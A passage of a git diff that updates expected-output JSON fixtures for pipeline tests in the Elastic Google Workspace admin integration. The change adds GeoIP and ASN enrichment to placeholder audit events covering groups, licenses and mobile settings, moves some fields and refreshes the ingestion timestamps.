"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"DELETE_GROUP\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"}]}}", "provider": "admin", "action": "DELETE_GROUP", @@ -143,24 +164,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" 
@@ -193,8 +205,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:38:43.717697700Z", + "ingested": "2021-12-14T14:44:38.692861032Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CHANGE_GROUP_DESCRIPTION\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"}]}}", "provider": "admin", "action": "CHANGE_GROUP_DESCRIPTION", @@ -218,6 +251,9 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" @@ -252,6 +288,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -261,7 +309,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:43.717704Z", + "ingested": "2021-12-14T14:44:38.692861745Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"GROUP_LIST_DOWNLOAD\"}}", "provider": "admin", "action": "GROUP_LIST_DOWNLOAD", 
@@ -284,18 +332,6 @@ ] }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -328,8 +364,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:38:43.717708300Z", + "ingested": "2021-12-14T14:44:38.692862345Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"ADD_GROUP_MEMBER\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "ADD_GROUP_MEMBER", @@ -353,24 +410,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" 
@@ -403,8 +451,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:38:43.717712700Z", + "ingested": "2021-12-14T14:44:38.692862987Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"REMOVE_GROUP_MEMBER\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "REMOVE_GROUP_MEMBER", @@ -428,24 +497,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" 
@@ -478,8 +538,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:38:43.717717400Z", + "ingested": "2021-12-14T14:44:38.692863557Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"UPDATE_GROUP_MEMBER\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UPDATE_GROUP_MEMBER", @@ -503,24 +584,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" 
@@ -553,8 +625,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:38:43.717721500Z", + "ingested": "2021-12-14T14:44:38.692864236Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS", @@ -578,24 +671,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" 
@@ -628,8 +712,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:38:43.717726100Z", + "ingested": "2021-12-14T14:44:38.692864882Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS_CAN_EMAIL_OVERRIDE\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS_CAN_EMAIL_OVERRIDE", @@ -653,6 +758,9 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" @@ -692,6 +800,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -701,7 +821,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:43.717729800Z", + "ingested": "2021-12-14T14:44:38.692865499Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"GROUP_MEMBER_BULK_UPLOAD\",\"parameters\":[{\"name\":\"GROUP_MEMBER_BULK_UPLOAD_FAILED_NUMBER\",\"value\":\"0\"},{\"name\":\"GROUP_MEMBER_BULK_UPLOAD_TOTAL_NUMBER\",\"value\":\"10\"}]}}", "provider": "admin", "action": "GROUP_MEMBER_BULK_UPLOAD", @@ -752,6 +872,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -761,7 +893,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:43.717734400Z", + "ingested": "2021-12-14T14:44:38.692866239Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"GROUP_MEMBERS_DOWNLOAD\"}}", "provider": "admin", "action": "GROUP_MEMBERS_DOWNLOAD", @@ -784,18 +916,6 @@ ] }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" 
@@ -828,8 +948,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:38:43.717738700Z", + "ingested": "2021-12-14T14:44:38.692867240Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CHANGE_GROUP_NAME\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "CHANGE_GROUP_NAME", @@ -853,24 +994,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" 
@@ -903,8 +1035,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:38:43.717743800Z", + "ingested": "2021-12-14T14:44:38.692867893Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CHANGE_GROUP_SETTING\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_GROUP_SETTING", @@ -928,6 +1081,9 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" @@ -971,6 +1127,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -980,7 +1148,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:43.717749700Z", + "ingested": "2021-12-14T14:44:38.692868608Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"WHITELISTED_GROUPS_UPDATED\",\"parameters\":[{\"name\":\"WHITELISTED_GROUPS\",\"value\":\"a,b,c\"}]}}", "provider": "admin", "action": "WHITELISTED_GROUPS_UPDATED", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-licenses.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-licenses.log-expected.json index c405f24e075..c35998b0e86 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-licenses.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-licenses.log-expected.json @@ -32,6 +32,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -41,7 +53,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:45.984529200Z", + "ingested": "2021-12-14T14:44:41.268400229Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"ORG_USERS_LICENSE_ASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}", "provider": "admin", "action": "ORG_USERS_LICENSE_ASSIGNMENT", @@ -94,6 +106,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -103,7 +127,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:45.984540Z", + "ingested": "2021-12-14T14:44:41.268403213Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"ORG_ALL_USERS_LICENSE_ASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}", "provider": "admin", "action": "ORG_ALL_USERS_LICENSE_ASSIGNMENT", 
@@ -156,6 +180,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -165,7 +201,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:45.984545800Z", + "ingested": "2021-12-14T14:44:41.268403670Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"USER_LICENSE_ASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}", "provider": "admin", "action": "USER_LICENSE_ASSIGNMENT", @@ -218,6 +254,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -227,7 +275,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:45.984551500Z", + "ingested": "2021-12-14T14:44:41.268404097Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"CHANGE_LICENSE_AUTO_ASSIGN\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}", "provider": "admin", "action": "CHANGE_LICENSE_AUTO_ASSIGN", @@ -280,6 +328,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -289,7 +349,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:45.984555500Z", + "ingested": "2021-12-14T14:44:41.268404481Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"USER_LICENSE_REASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}", "provider": "admin", "action": "USER_LICENSE_REASSIGNMENT", 
@@ -342,6 +402,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -351,7 +423,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:45.984560400Z", + "ingested": "2021-12-14T14:44:41.268404876Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"ORG_LICENSE_REVOKE\",\"parameters\":[{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}", "provider": "admin", "action": "ORG_LICENSE_REVOKE", @@ -404,6 +476,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -413,7 +497,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:45.984565500Z", + "ingested": "2021-12-14T14:44:41.268405265Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"USER_LICENSE_REVOKE\",\"parameters\":[{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}", "provider": "admin", "action": "USER_LICENSE_REVOKE", @@ -466,6 +550,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -475,7 +571,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:45.984571100Z", + "ingested": "2021-12-14T14:44:41.268410141Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"UPDATE_DYNAMIC_LICENSE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}", "provider": "admin", "action": "UPDATE_DYNAMIC_LICENSE", 
diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-mobile.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-mobile.log-expected.json index e3609db5e6d..00eba1d9377 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-mobile.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-mobile.log-expected.json @@ -36,6 +36,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -45,7 +57,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:46.977331400Z", + "ingested": "2021-12-14T14:44:42.510359841Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ACTION_CANCELLED\",\"parameters\":[{\"name\":\"ACTION_ID\",\"value\":\"id\"},{\"name\":\"ACTION_TYPE\",\"value\":\"ACCOUNT_WIPE\"},{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "ACTION_CANCELLED", @@ -103,6 +115,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, 